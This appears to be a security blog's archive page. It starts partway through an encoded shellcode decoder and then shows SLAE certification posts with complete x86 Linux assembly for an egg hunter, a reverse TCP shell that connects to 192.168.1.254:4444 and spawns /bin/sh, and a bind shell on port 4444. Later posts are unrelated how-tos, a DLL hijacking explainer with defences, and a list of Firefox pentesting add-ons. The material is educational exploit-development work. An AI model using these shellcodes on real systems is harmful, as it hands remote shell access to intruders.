        mov bl, byte [eax]  ; bl = next valid byte of the shellcode
        mov byte [esi], bl  ; move it to the final position
 
        mov edi, eax        ; put latest valid pisition into edi 
        inc edi             ; next distance
        inc esi             ; next valid byte
 
        loop restore        ; loop
        
        pop ecx             ; call shellcode
        call ecx            
 
        xor eax, eax        ; exit the shellcode (if it returns)
        mov al, 1           
        xor ebx,ebx         
        int 0x80            
 
end:
        call decoder  ; put shellcode addr into stack
        shelcode: db 0x31,0x01,0xc0,0x03,0x7a,0x6b,0x50,0x03,0x76,0x50,0x68,0x02,0x4f,0x62,0x03,0x6c,0x49,0x61,0x01,0x73,0x01,0x68,0x02,0x54,0x68,0x01,0x62,0x03,0x5e,0x7a,0x69,0x01,0x6e,0x01,0x2f,0x03,0x54,0x48,0x68,0x01,0x2f,0x03,0x47,0x4d,0x2f,0x01,0x2f,0x01,0x2f,0x01,0x89,0x03,0x4a,0x62,0xe3,0x01,0x50,0x02,0x42,0x89,0x02,0x63,0xe2,0x02,0x62,0x53,0x03,0x4f,0x41,0x89,0x01,0xe1,0x03,0x72,0x5b,0xb0,0x03,0x48,0x66,0x0b,0x02,0x61,0xcd,0x02,0x4f,0x80,0x03,0x41,0x4e

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


lunes, 5 de mayo de 2014

[SLAE] III Egg Hunting

Source: SecurityTube


I found a very interesting document explained different techniques of Egg hunting, in this document explained how to search it in Windows and Linux, you can found this document here. I really recommend read this paper if you want know how it works
;SLAE-513 Andriy Brukhovetskyy
;egg hunting explained some techniques  
;http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
;35 bytes

global _start
section .text
_start:

    xor ecx, ecx    ; 0
        
get_memory_block:
    or dx, 0xfff    ; is the same as "add dx, 4095" (PAGE_SIZE)
        
checker:

    inc edx         ; next memory offset
    push byte +0x21 ; __NR_access 33
    pop eax

    lea ebx, [edx+4] ; alignment to validate the last four bytes of the signature
                     ; ecx already contains 0 (F_OK)
    int 0x80         ; syscall

    ; bad address = EFAULT = 0xf2 = -14
    cmp al, 0xf2; because it's not a file

    jz get_memory_block ; if is not, loop

    mov eax, 0x50905090 ; egg here in little endiant
    mov edi, edx
    
    scasd; compare next 4 bytes and edi+4 
    jnz checker ; return and search

    scasd; compare next 4 bytes and edi+4 
    jnz checker ; return and search

    jmp edi; if we here == we found the eggs, jump to our shellcode :)

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


viernes, 2 de mayo de 2014

[SLAE] II Reverse TCP shell

Source: SecurityTube


Source: TutorialsPoint

Ok, to implement reverse tcp shell is a bit easy then bind shell, because all what we need is a configure socket and do the connection to our server/listener. In the image above sees TCP Client we only need socket() and connect(), information about details from witch parameters need to be setup, check TutorialPoint manual. I tried to comment all lines in code witch need explication, so code is auto explained, I hope so :D

For compilation please check this script 


;coded by SLAE - 513 - Andriy Brukhovetskyy
;syscall numbers can be found here /usr/include/asm/unistd_32.h
;socketcall man - http://www.tutorialspoint.com/unix_sockets/socket_core_functions.htm
;socket families definitions can be locked here: /usr/src//include/linux/socket
;or we can use python socket modude - example socket.AF_INET
;Values needed to configure socket can be found here:
;/usr/include/linux/net.h
;96 bytes lenght

global _start
section .text

_start:
        ;int socket (int family, int type, int protocol);
        xor eax, eax
        mov al, 102   ; socketcall
        xor ebx, ebx
        mov bl, 1     ; 1 = SYS_SOCKET socket()
        xor ecx, ecx
        push ecx      ; putting 0
        push BYTE 6   ; IPPROTO_TCP - int protocol
        push BYTE 1   ; SOCK_STREAM - int type
        push BYTE 2   ; AF_INET     - int domain
        mov ecx, esp  ; ECX - PTR to arguments for socket()
        int 0x80

        mov esi, eax  ; save socket fd in ESI for later
        
        ;int connect(int sockfd, struct sockaddr *serv_addr, int addrlen);
        xor eax, eax
        mov al, 102 ; socketcall
        xor ebx, ebx
        mov bl, 3   ; 3 = sys_connect()
        xor edx, edx
        
        push dword 0xfe01a8c0; ip 192.168.1.254 little endiant!
        push word 0x5c11     ; port 4444 little endiant!
        
        dec ebx       ; ebx now is 2
        push word bx  ; 2 - AF_INET
        inc ebx       ; 3
        mov ecx, esp  ; ptr to struct sockaddr
        push byte 16  ; socklen_t addrlen
        push ecx      ; struct sockaddr *addr
        push esi      ; int sockfd
        mov ecx, esp  ; ECX = PTR to arguments for connect()
        int 0x80      ; sockfd will be in EBX
        
        mov eax, ebx ; sockfd
        push BYTE 3  ; count for dup2
        pop ecx      ; get count
          
        ;forwaring STDIN/STDOUT/STDERR
dup2_loop:
        dec ecx
        mov BYTE al, 63; dup2 syscall number
        int 0x80
        jnz dup2_loop ; jump if not 0
        
        ; spawning as shell
        xor eax, eax
        mov al, 11 ; execve syscall
        xor edx, edx
        push edx
        ; '/bin//sh'[::-1] <- reverse mode
        push 0x68732f2f ; hs//
        push 0x6e69622f ; nib/
        mov ebx, esp
        push edx
        push ebx
        mov ecx, esp    ; ESP is now pointing to EDX
        push edx
        mov edx, esp
        int 0x80

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


martes, 29 de abril de 2014

[SLAE] I Bind shell


Source: SecurityTube

Ok, when I saw examen exercises I still a bit confused from where to start to do this, but after a bit of research. I get it. Bind shell is like tiny TCP Server, look to the next image:

Source: TutorialPoint

We need configure socket for this  Bind ->Listen -> Accept and then pass STDIN/STDOUT/STDERR to EXECVE
Compilation
#!/bin/bash

echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm

echo '[+] Linking ...'
ld -o $1 $1.o

echo '[+] Your Shellcode:'
echo $(objdump -d ./$1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g')

echo '[+] Done!'
;coded by SLAE - 513 - Andriy Brukhovetskyy
;Bind port 4444 - last 2 bytes
;syscall numbers can be found here /usr/include/asm/unistd_32.h
;socketcall man - http://www.tutorialspoint.com/unix_sockets/socket_core_functions.htm
;socket families definitions can be locked here: /usr/src//include/linux/socket
;or we can use python socket modude - example socket.AF_INET
;Values needed to configure socket can be found here:
;/usr/include/linux/net.h
;109 bytes long 


global _start
section .text

_start:
    ;int socket (int family, int type, int protocol);
    xor eax, eax
    mov al, 102     ; socketcall
    xor ebx, ebx
    mov bl, 1      ; 1 = SYS_SOCKET socket()
    push BYTE 6    ; IPPROTO_TCP - int protocol
    push BYTE 1    ; SOCK_STREAM - int type
    push BYTE 2    ; AF_INET     - int domain
    mov ecx, esp   ; ECX - PTR to arguments for socket()
    int 0x80
    mov esi, eax    ; save socket fd in ESI for later

    jmp short jmp_call_pop
body:
    pop edi        ; getting port address from ESP, putted by call in jmp_call_pop

    ;int bind(int sockfd, struct sockaddr *my_addr,int addrlen);
    push BYTE 102
    pop eax        ; socketcall
    inc ebx        ; 2 = SYS_BIND bind()
    xor edx, edx
    push edx        ; 0 = ANY HOST (0.0.0.0)};
    push WORD [edi] ; PORT specified at the end. Last two bytes in HEX.
    push WORD bx    ; 2 = AF_INET - struct sockaddr short sin_family,
    mov ecx, esp    ; Save PTR to sockaddr struct in ECX
    push BYTE 16    ; socklen_t addrlen
    push ecx        ; const struct sockaddr *addr
    push esi        ; int sockfd
    mov ecx, esp    ; ECX = PTR to arguments for bind()
    int 0x80
        
        ;int listen(int sockfd,int backlog);
    mov BYTE al, 102; socketcall
    inc ebx
    inc ebx        ; 4 = SYS_LISTEN listen()
    push BYTE 1    ; int backlog
    push esi       ; int sockfd,
    mov ecx, esp   ; ECX = PTR to arguments for listen()
    int 0x80

        ;int accept (int sockfd, struct sockaddr *cliaddr, socklen_t *addrlen);
    mov BYTE al, 102; socketcall
    inc ebx     ; 5 = SYS_ACCEPT = accept()
    push edx    ; socklen_t *addrlen = 0
    push edx    ; struct sockaddr *cliaddr = NULL
    push esi    ; int sockfd,
    mov ecx, esp; ECX = PTR to arguments for accept()
    int 0x80

    ; dup2 to duplicate sockfd, that will attach the client to a shell and redirrect STDIN, STDOUT, STRERRR
    ; that we'll spawn below in execve syscall
    xchg eax, ebx    ; after EBX = sockfd, EAX = 5
    push BYTE 3
    pop ecx

dup2_loop:
        dec ecx
    mov BYTE al, 63
    int 0x80
    jnz dup2_loop ; jump if not 0

    ; spawning as shell
    xor eax, eax
    push eax
    ; '/bin//sh'[::-1] <- reverse mode
        push 0x68732f2f ; hs//
        push 0x6e69622f ; nib/
    mov ebx, esp
    push eax
    mov edx, esp    ; ESP is now pointing to DX
    push ebx
    mov ecx, esp
    mov al, 11    ; execve syscall
    int 0x80

jmp_call_pop:
    call body
    db 0x11, 0x5c    ; port 4444 you can put any 0 free port


SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert

jueves, 13 de marzo de 2014

[How to] Python IDLE tab completion

1. Put the codes into a file named '.pythonstartup'.

import pdb

# python startup file
import readline
import rlcompleter
import atexit
import os

# tab completion
readline.parse_and_bind('tab: complete')

# history file
histfile = os.path.join(os.environ['HOME'], '.pythonhistory')

try:
    readline.read_history_file(histfile)
except IOError:
    pass

atexit.register(readline.write_history_file, histfile)
del os, histfile, readline, rlcompleter

2. Put the file into your HOME directory.
Linux/Mac : ~/.pythonstartup Windows : C:\Users\USERNAME\.pythonstartup
PS: In MacOsX probably you will need to install readline
sudo easy_install readline 
3. Set the Environment Variables.

In Windows : Just do it like this.

In Linux/Mac : Put the line into the file named '.profile'.
 export PYTHONSTARTUP=~/.pythonstartup 
Previews:


Source: 0nly.me

domingo, 9 de marzo de 2014

[How to] Android pc and remote torrent control


Hi, now days Android pc/sticks is very common, and probably many of the people search solution how to manage their torrent client(installed on android) from web/other device. I found one very interesting solution Ttorrent:



This app has 2 versions: Lite and Pro

Lite version has limited of download speed to 250 kb/s and ads (version for MIPS)
Pro version no has any limits :) (version for MIPS)

Features of pro version 1.3.0:

- UNLIMITED DOWNLOAD SPEED!
- chose single files for download from torrents containing multiple files
- multiple torrent downloading
- queuing
- search for torrents
- Wifi only mode, Wifi or WiMAX mode
- able to set Upload / Download speed in options
- web browser integration
- magnet link support
- trackerless torrent (DHT) support
- RSS support(automatically download torrents published in feeds)
- UPnP and NAT-PMP support
- IP filtering support
- proxy support (SOCKS, HTTP)
- encryption
- Local Peer Discovery
- creating torrents
- x86 compatibility
- Web interface

- custom label support

Web Interface:




At the moment is a bit poor of functionality, only permit add torrent file or magnet link, and remove/pause/restore. Choose of file to download (work only in transdroid).

Other solution to manage Ttorrent is: transdroid

Transdroid is a universal app to manage different torrent clients.
Some screenshots from official page:





Web interface enabling:

Settings -> Interface -> enable web interface

I recommend change default port number.

Transdroid configuration: 

1) Download and install transdroid
2) Settings -> Add new server
3) You can specify name to this client, but this is optional
4) Select in Server type -> qBittorrent
5) Put your Android device(where installed torrent client) IP address (you can see it in Android settings)
6)Advanced settings -> Port number, you need to put there web interface port number if you change, if not by default this is: 1080

Now you can use Transdroid to manage your torrent client

When author of Ttorrent will add web interface authentication I will publish manual how to configure web interface and Transdroid to can access them from any place, expose it to internet

We can suggest some feature to Ttorrent here

Transdroid screenshots source transdroid
Torrent screenshot source Ttorrent

How to configure access to your torrent server from anywhere:

You will need to create an account on no-ip.com and do some configuration, you can see how on the video 


Then install no-ip client app in your android device and login with your account.

Update 1 19/04/2014 Web autentificacion and HTTPS added
Update 2 26/04/2014 How to access to your torrent server from everything

Best regards

domingo, 16 de febrero de 2014

[How to] Quick Tip: Enabling the Android Move To SD Card Feature

Found it some time ago, actually for android it's not very useful, but for users with old versions of android is very useful :)

Tip

Best regards

lunes, 10 de febrero de 2014

Damn Vulnerable IOS Application | learning Apple IOS security

ABOUT - Damn Vulnerable IOS Application:

was born from the need to have a tool where a user can test their IOS penetration testing skills in a safe and legal environment. Also, this application can be used by mobile security enthusiasts and students to learn or review the basics of mobile application security.

Vulnerabilities and Challenges Include …

Insecure Data Storage
Jailbreak Detection
Runtime Manipulation
Transport Layer Security
Client Side Injection
Information Disclosure
Broken Cryptography
Application Patching

All these vulnerabilities and their solutions have been tested upto IOS 7.0.4

The app also contains a section on IOS Application Security Tutorials for those who want to learn IOS Application Pentesting. Every challenge/vulnerability has a link for a tutorial that users can read to learn more on that topic.

This app will only run on devices running IOS 7 or later. Users can download the source code and run the application on previous versions of IOS as well.

If you would like to sponsor DVIA, please use the contact form below to get in touch.

LEARN The complete list of tutorials can be found below

IOS Application Security Part 1 – Setting up a mobile pentesting platform
IOS Application Security Part 2 – Getting class information of IOS app
IOS Application Security Part 3 – Understanding the Objective-C Runtim
IOS Appllication Security Part 4 – Runtime Analysis Using Cycript (Yahoo Weather App)
IOS Application Security Part 5 – Advanced Runtime analysis and manipulation using Cycript (Yahoo Weather App
IOS Application Security Part 6 – New Security Features in IOS 7
IOS Application Security Part 7 – Installing and Running Custom Applications on Device without a registered developer account
IOS Application Security Part 8 – Method Swizzling using Cycript
IOS Application Security Part 9 – Analyzing Security of IOS Applications using Snoop-it
IOS Application Security Part 10 – IOS Filesystem and Forensics
IOS Application Security Part 11 – Analyzing Network Traffic over HTTP/HTTPS
IOS Application Security Part 12 – Dumping Keychain Data
IOS Application Security Part 13 – Booting a custom Ramdisk using Sogeti Data Protection tool
IOS Application Security Part 14 – Gathering information using Sogeti Data Protection tools
IOS Application Security Part 15 – Static Analysis of IOS Applications using iNalyzer
IOS Application Security Part 16 – Runtime Analysis of IOS Applications using iNalyzer
IOS Application Security Part 17 – Black-Box Assessment of IOS Applications using INTROSPY
IOS Application Security Part 18 – Detecting custom signatures with Introspy
IOS Application Security Part 19 – Programmatical Usage of Introspy
IOS Application Security Part 20 – Local Data Storage
IOS Application Security Part 21 – ARM and GDB Basics
IOS Application Security Part 22 – Runtime Analysis and Manipulation using GDB
IOS Application Security Part 23 – Defending against runtime analysis and manipulation
IOS Application Security Part 24 – Jailbreak Detection and Evasion
IOS Application Security Part 25 – Secure Coding Practices for IOS Development
IOS Application Security Part 26 – Patching IOS Applications using IDA Pro and Hex Fiend
IOS Application Security Part 27 – Setting up a mobile pentesting environment with IOS 7 Jailbreak
IOS Application Security Part 28 – Patching IOS Application with Hopper
IOS Application Security Part 29 – Insecure or Broken Cryptography

Source

domingo, 9 de febrero de 2014

[How to] Unzip files in RAM memory

Is very easy unzip files, you can found many examples on internet, but here is one which works perfect for me.

Here you have a POC:

import requests 
import tempfile 
import zipfile  

zip = requests.get(zip_file_url)

temp = tempfile.TemporaryFile()
temp.write(zip.content)
temp.seek(0) 

zfile = zipfile.ZipFile(temp)

#set password if needed 
zfile.setpassword('infected') 
 
for name in zfile.namelist():
    ram_file = zfile.open(name).read()

temp.close()

For large files you can use:
import requests
import tempfile
import zipfile

zip  = requests.get(zip_file_url)
temp = tempfile.TemporaryFile()

content = ''

for block in zip.iter_content(1048576):
    
    if not block:
        break
        
    content += block
    
temp.write(content)
temp.seek(0)

zfile = zipfile.ZipFile(temp)

#set password if needed
zfile.setpassword('infected')

for name in zfile.namelist():
    ram_file = zfile.open(name).read()
    
temp.close()
with this don't work :(
with tempfile.TemporaryFile() as temp
    for block in zip.iter_content(1048576):
    
        if not block:
            break
        
        temp.write(block)


For more information about tempfile look here

Best regards

jueves, 30 de enero de 2014

[How to] DLL Hijacking + tool + Attack example


DLL Hijacking is really a simple concept.

Applications load external code via DLLs (Dynamic Link Libraries). DLL Highjacking is a process by which malicious code is injected into an application via a malicious DLL with the same name as a DLL used by the application.

An application is vulnerable to DLL hijacking depending on how they reference their DLLs. One example is using relative paths instead of the absolute path to the DLL. Another is loading DLLs using environment variables that may not be set properly in which case the directory defaults to a relative path of the executing application.

So, let's pretend your system's DLL search path looks something like this:

If SafeDllSearchMode is enabled, the search order is as follows:
  1. The directory from which the application loaded.
  2. The system directory. Use the GetSystemDirectory function to get the path of this directory.
  3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
  4. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
  5. The current directory.
  6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

If SafeDllSearchMode is disabled, the search order is as follows:
  1. The directory from which the application loaded.
  2. The current directory.
  3. The system directory. Use the GetSystemDirectory function to get the path of this directory.
  4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
  5. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
  6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

More details about this, you can read here - msdn

Here you can see a simple attack using Metasploit :)




DllHijackAuditor - checking application to this vulnerability can be found here

What about protection?
In older version of Windows (2000 - Xp is disabled by default) you can active SafeDllSearchMode in registry: 

          HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode
From msdn.microsoft.com: Safe DLL search mode is enabled by default starting with Windows XP with Service Pack 2 (SP2). 
I have Windows 7 Pro with all updates installed and I don't have this feature activated :(

While you are waiting for software patches there are a couple of things you can do to limit your exposure to DLL hijacking attacks.

Deploy the CWDIllegalInDllSearch Fix

The initial response by Microsoft to this class of vulnerabilities was to provide a registry modification that helps mitigate the attack by changing how dynamic DLL loading works. The fix should be deployed very carefully as it has the potential break the functionality of installed applications, but it’s worth testing if you are concerned about this attack vector. You can read up on the fix here.

Block Outbound SMB at the Perimeter

Most organizations should be doing this already, but if you aren’t then now is a good time to start. This will also help prevent against a few other types of attacks.

Uninstall the Vulnerable Software

This may not always be feasible, but if you are running a vulnerable application that is easily replaceable then the secure thing to do is make the switch.

Deploy Intrusion Detection Software

In some cases you simply won’t be able to mitigate the attack properly. As a result, the best thing you can hope to do is catch the attacker during post-exploitation. Using something like Snort is free (less the cost of the hardware) and does a really good job of detecting signatures of post exploitation activity that might occur after someone has exploit a vulnerable machine.

Conclusion

The advent of so many DLL hijacking vulnerabilities presents an interesting scenario because it’s not easily fixable by an operating system patch and it affects so many widely used applications. The best you can really do is to be sure you are educated and aware of how the vulnerability works, how to test if it exists on applications running in your network, and how to get the right information to the people who can issue a patch to fix it. This time, we all get to play the part of security vulnerability researcher.

martes, 28 de enero de 2014

A modern GNU/Linux firewall | Application layer firewall

Douane is a modern firewall filtering the outgoing network traffic per applications in order to protect your privacy by controlling the information going out of your GNU/Linux machine. At the moment only work on ubuntu/debial

The built-in features available in Douane


Simple as answering a question As soon as you have access to a network, applications will try to send whatever information. Behind your traffic (emails, social networks, online videos, ...) you will discover some activities that you did not expected. Douane will block all the unknown traffic and let you decide if you allow it or not via this dialog box. Clicking the Allow or Deny buttons will create the rule for you. 

A single place to control Douane

This is the control panel. 

It will allow you to start and stop the firewall, to enable/disable the firewall autostart at boot, let you configure the rules and keep you informed by showing you the latest tweets!

My experience with instalation on ubuntu

1) add repository
sudo apt-add-repository ppa:zedtux/douane

2) update sources
sudo apt-get update

3) download latest stable version from github
*in repository you only has a testing version, and for my is don't work

https://github.com/Douane/Douane/tree/master/packages/debian_ubuntu

4) install douane-configurator
sudo apt-get install  douane-configurator

5) reboot your system and enjoy it :)

Source

Best regards

martes, 14 de enero de 2014

[How to] Debugging python script step-by-step

You can found many solution of this, but quick solution can be:

1) As simple as add to your script:

import pdb
pdb.set_trace()

That will give you an interpreter prompt for debugging.

2) winpdb - A platform independent Python debugger. You can found tutorial here.

First solution source

Best regards

lunes, 13 de enero de 2014

HTTPie - a CLI, cURL-like tool for humans.

HTTPie is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized responses. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.


Installation

The latest stable version of HTTPie can always be installed or updated to via pip (prefered) or easy_install:

$ pip install --upgrade httpie

Alternatively:

$ easy_install httpie



World’s Best 50 Firefox Pentesting AddOns

We believe we have made the world’s most comprehensive penetration testing browser addons list. If you feel otherwise then please let us know in the comments below.

If you are a pentester, ethical hacker or work in the IT security information space then you obviously need tools to perform penetration tests. There are a million different tools out there – all of which essentially fall under one of these categories:

Password cracking tools, such as ophcrack and John the Ripper
Network scanning software, such as the legendary Nmap or NetScanTools
Network vulnerability scanning tools, with a good example being QualysGuard
Network analyzer software, Cain & Abel, Wireshark and OmniPeek
Wireless network analyzer and software, such as Aircrack-ng and CommView
File search software (mainly for forensics), an example being FileLocator Pro
Web application vulnerability scanning software, for example Acunetix and WebInspect
Database vulnerability security scanning software, like SQLPing3 or AppDetective
Exploit software with a solid example being the age-old proven and tested Metasploit

As an information security professional, knowledge of how to use these tools is obviously a critical skill you must have.

If you are just starting your career and are studying an IT security certification then you will have to learn how to use these tools effectively. A solid plan is to become familiar with a Linux pentesting security distro – of which there are many.

OK! So we all love Firefox right? Good – because this list came from their addons section!

1. Access Me
The first tool on our list is called “Access Me” which examines vulnerabilities in applications. This allows a pentester/ ethical hacker etc to access network or computer system resources without being authenticated. In short, Access Me is used to test for Access vulnerabilities.

2. JavaScript Deobfuscator
This pentesting addon tells you what JavaScript files are running within an HTML page or other, even if it is obfuscated and generated elsewhere. Simply open the JavaScript Deobfuscator app from the Firefox Tools menu and watch the scripts being compiled or executed. Kinda similar to NoScript. Should add that if this addon is on all the time then all code will render slower so you are best advised to only use it when you need it.

3. SQL Inject ME
Good ole SQL Injection vulnerabilities can cause a lot of damage to a web application as any good pentester will tell you. A malicious user can possibly view records, delete records, drop tables and basically go ahead and gain access to your server. SQL Inject-Me is tests for this – i.e. SQL Injection vulnerabilities.

4. FoxyProxy
FoxyProxy is an old hat, been around for a while now. There is tons of help on setting this up – just hit up YouTube and take a look. For the complete newbies reading this, FoxyProxy is an advanced proxy management tool that can replace Firefox’s proxying capabilities, (which are pretty limited). There are others out there, such as SwitchProxy, QuickProxy or the infamous TorButton.

5. Key Manager
This pentesting tool allows for Key Generation, Certificate Enrolment and Authority Delegation. In summary you can see encryption keys that are generated when you visit secure websites. You can also create your own encryption keys.

6. Selenium IDE
Got to be honest about this one, we don’t know too much about it. More detailed info here about Selenium IDE, but what we can tell you is what we read elsewhere, i.e. that this addon “is an integrated development environment for Selenium scripts. It is implemented as a Firefox extension, and allows you to record, edit, and debug tests.”

7. CookieSwap
This addon does exactly what its’ name suggests. From a pentesters point of view, being able to change your cookies allows you to identity and understand how sites treat you differently depending on who you are. For example, if a travel site recognizes you as a returning customer they give you a page showing similar flight choices for example. Google uses ‘Personalized Search’, where they modify their search results based on your personal identity. So if you have a Google account then you’ll be treated to a ‘Personalized Search.’ CookieSwap allows you to be anonymous. Quite a nice tool for those interested in SEO since Search Engine Results can differ.

8. FoxySpider
FoxySpider is a web crawler! This tool scrapes websites to find what you want. The tool can scan for videos, images, PDF’s etc. FoxySpider displays the located items in a well-structured thumbnail gallery for ease of use.

9. OSVDB
This tool hits the Open Source Vulnerability Database Search and gives you known security vulnerabilities. The community is great and stemmed from the Black Hat conferences. This is one of the best addons in our opinion.

10. Tamper Data
Tamper Data acts as a proxy in a MITM way – by inserting itself between the user (client) and the web site or application. This tool allows the IT security professional to investigate all elements of HTTP – especially all the GET’s and POST’s that can be manipulated without the constraints imposed by the user interface normally seen in the browser.

11. Domain Details
Its’ name says it all – this is a nice and simple addon because it displays the server type, headers, precise IP address and location and whois.

12. Live HTTP Headers
If your interested in headers then also take a look at Tamper Data (a few above this one). Live HTTP headers shows headers of the actual page or application that you are browsing.

13. URL Flipper
URL allows the pentester to increment or decrement a section of a URL without having to manually edit the string in the location field within FireFox.

14. Greasmonkey
This is a classic and a very popular addon – which allows you to manipulate a web page by using small bits of JavaScript.

15. PassiveRecon
PassiveRecon provides information IT security professionals with the ability to execute “packetless” discovery of target resources utilizing publicly available information. Used with the Open Source Vulnerability Database Search for maximum affect.

16. User Agent Switcher
The User Agent Switcher allows the switching of user agent data of a browser.

17. Groundspeed
Groundspeed allows security testers to manipulate the application user interface to eliminate possible limitations and client-side restrictions that interfere with penetration testing.

18. Poster
This tool allows you to interact with web services and other web resources by showing HTTP requests, entity body commands, and content type. See also Live HTTP Headers.

19. Firebug
Probably the best known addon in our 2013 Concise Courses Pentesting Firefox addon list. This addon works well for developers, designers and Security Professionals equally since the user can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page. It is one of those apps that once you get started with it you’ll always use it.

20. HackBar
This is one of our most highly recommended addons for Firefox. Hackbar is not an exploitation penetration tool – rather, it is helps you with your work flow. This toolbar will help to test sql injections, XSS holes and overall site security.

21. RESTClient
Similar to Live HTTP Headers, RESTClient supports all HTTP methods RFC2616 (HTTP/1.1) and RFC2518 (WebDAV). You can construct custom HTTP requests.

22. Wappalyzer
Wappalyzer identifies software on websites. Again, can be used with Open Source Vulnerability Database Search.

23. Host Spy
Useful if you want to know if your neighbour is spitting out spam since you can see who is on the same IP as you are.

24. Firecookie
Firecookie works alongside Firebug. Rather similar to SwapCookies, this addon creates and deletes existing cookies.

25. HttpFox
Got to love this one. If you like Wireshark then this addon is your friend. HttpFox monitors and analyzes all incoming and outgoing HTTP traffic between the browser and the web servers.

26. RefControl
You are able to create a list of sites, and the referrer that should be sent for each site. You can select to send that referrer unconditionally or only for third-party requests. Alternatively, you can specify the default behavior for any site not on your generated list.

27. XSS-Me
XSS-Me is a security pentesting exploitation tool designed to test for Cross-Site Scripting (XSS). The addon looks for possible entry points for an attack against a system.

28. XSSed Search
Related to the addon above, this allows for the searching of cross-site scripting vulnerabilities at the XSSed database.

29. Firesheep
This addon got a lot of publicity. This addon highlights HTTP session hijacking (when a hacker gets their hands on a user’s cookies). There is a similar tool called Facesniff for Android. As cookies are transmitted over networks, this tool, which is a packet sniffer, can discover identities and allows the pentester to take on the log-in credentials of the user or victim.

30. JSview
JSview allows you to access all Javascript.

31. NoScript
Probably the best known addon within this list – NoScript provides massive protection to Firefox by denying JavaScript, Java and other executable content. This protects against cross-site scripting attacks (XSS), cross-zone DNS rebinding / CSRF attacks (router hacking), and Clickjacking attempts. Pretty cool.

32. Proxybar
Similar to FoxyProxy. The user can change proxy.

33. Cookie Watcher
This tool probably helps the developer more than the pentester – because it can quickly wipe ‘session’ cookies. The main purpose of this though is to help identify cluster nodes by cookie values.

34. WOT
Another highly popular addon. The Web of Trust shows you “trusted sites” – from a pentesters point of view it allows for a snapshot of the credibility of backlinks or otherwise.

35. Google Site Indexer
This tool generates site maps based on Google queries which can be useful for both Penetration Testing and Search Engine Optimization. The tool sends zero packets to the host making it anonymous.

36. refspoof
Allows for URL Spoofing by pretending to origin from any site by overriding the url referrer in an HTTP request.

37. ShowIP
Shows the IP of the current page in the status bar. Also bundles info like hostname, ISP, country and the city.

38. Packet Storm search plugin
This allows the ethical hacker or pentester to search the packet storm database for exploits, tools and advisories.

39. Offsec Exploit-db Search
Allows for the ability to search the Exploit-db Archive – similar to the Open Source Vulnerability Database Search addon.

40. Security Focus Vulnerabilities Search Plugin
Allows for the ability to search the Security Focus – similar to the Open Source Vulnerability Database Search and Exploit-db Archive addons.

41. Cookie Watcher
Watch the selected cookie behavior direct in the status bar.

42. XML Developer Toolbar
This addon allows for XML Developer standard tools from within Firefox.

43. CipherFox
CipherFox allows you to view the specific SSL cipher that is being used to encrypt connections to a web site. The addon displays the keysize of the cipher and also allows for RC4 to be disabled.

44. FlagFox
Similarto ShowIP this addon displays a country flag for the location of a web server and other useful information.

45. ViewStatePeeker
ViewStatePeeker decodes and displays viewstate contents of an *.aspx page

46. CryptoFox
CryptoFox is an encryption/ decryption tool for cracking MD5 passwords. Great for pentesters and those working in IT Security.

47. Server Spy
As the name suggests, this addon tells you the technology of the web server (Apache, Samba, IIS etc) of the client you are working for.

48. Default Passwords
This addon searches the CIRT.net default password database.

49. Snort IDS Rule Search
This addon works with Snort’s open source network-based intrusion detection system (NIDS) which can perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks. Take a look at HttpFox if you are interested in this.

50. Header Spy
Similar to Live HTTP Headers – this addon shows HTTP Headers live on the status bar.

In summary
All these addons are really helpful. If you developed one of the addons within our list we’d love to hear from you. If we missed any out please get in touch with us!

We used Firefox as our browser of choice since we feel that it is the best loved amongst hackers – possibly because of its plug-in friendly design.

Source